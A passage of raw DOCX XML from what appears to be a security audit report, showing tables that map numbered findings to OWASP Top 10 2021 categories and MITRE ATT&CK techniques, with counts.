            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3273" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-12, PB1-01, PB1-05, PB1-07, PB2-05, PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.2 OWASP Top 10 2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Every finding is mapped to one or more OWASP Top 10 2021 categories.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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3712"/>
        <w:gridCol w:w="4320"/>
        <w:gridCol w:w="608"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A01:2021 Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-06, CF-09, CF-10, CF-11, CF-18, CI-13, PB1-03, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A02:2021 Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, DEP-02, DET-13, PB2-07, PB2-11, SEC-03, SEC-04, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A03:2021 Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-07, APP-12, CF-01, CF-06, CF-07, CF-08, CI-01, CI-10, DET-02, DET-05, DET-12, PB1-01, PB1-02, PB1-04, PB1-05, PB1-07, PB1-10, PB2-01, PB2-02, PB2-03, PB2-04, PB2-05, PB2-06, PB2-14, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A04:2021 Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-02, CF-11, CF-13, CF-15, CF-16, CI-03, CI-13, DET-03, DET-04, DET-06, PB1-07, PB1-08, PB1-09, PB1-11, PB1-12, PB1-13, PB1-14, PB1-17, PB1-18, PB2-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A05:2021 Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-05, APP-08, APP-09, APP-10, APP-12, APP-13, APP-14, CF-04, CF-05, CI-05, CI-15, DET-07, DET-15, DET-18, PB1-15, PB2-13, SEC-03, SEC-05, SEC-08, SEC-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A06:2021 Vulnerable and Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06, CF-04, CF-05, CF-07, CF-14, CI-05, DEP-01, DEP-02, DEP-04, DEP-06, DEP-07, DEP-08, DEP-09, DEP-12, DET-16, PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A07:2021 Identification and Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, PB1-06, PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A08:2021 Software and Data Integrity Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-13, APP-14, CF-02, CI-02, CI-08, DEP-01, DEP-02, DEP-03, DEP-05, DEP-07, DEP-10, DET-16, SEC-08, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A09:2021 Security Logging and Monitoring Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CF-16, CI-03, CI-09, DET-03, DET-04, DET-07, DET-08, DET-09, DET-14, DET-19, PB1-16, PB2-08, PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3712" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A10:2021 Server-Side Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings are mapped to the ATT&amp;CK techniques an attacker would use to exploit them, or that the weakness enables an attacker to perform (for defensive tooling that can be turned against the defender).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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4036"/>
        <w:gridCol w:w="4036"/>
        <w:gridCol w:w="568"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1059 Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-07, APP-12, CI-01, PB1-02, PB2-04, PB2-05, PB2-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1059.004 Command and Scripting Interpreter: Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-01, PB2-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1059.001 Command and Scripting Interpreter: PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-03, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1190 Exploit Public-Facing Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1195 Supply Chain Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1195.001 Supply Chain Compromise: Compromise Software Dependencies and Development Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-05, DEP-07, DEP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1195.002 Supply Chain Compromise: Compromise Software Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, CI-02, DEP-01, DEP-03, DEP-04, DEP-08, DEP-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1552 Unsecured Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>T1552.001 Unsecured Credentials: Credentials In Files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03, DEP-02, DEP-05, PB2-08, SEC-03, SEC-04, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
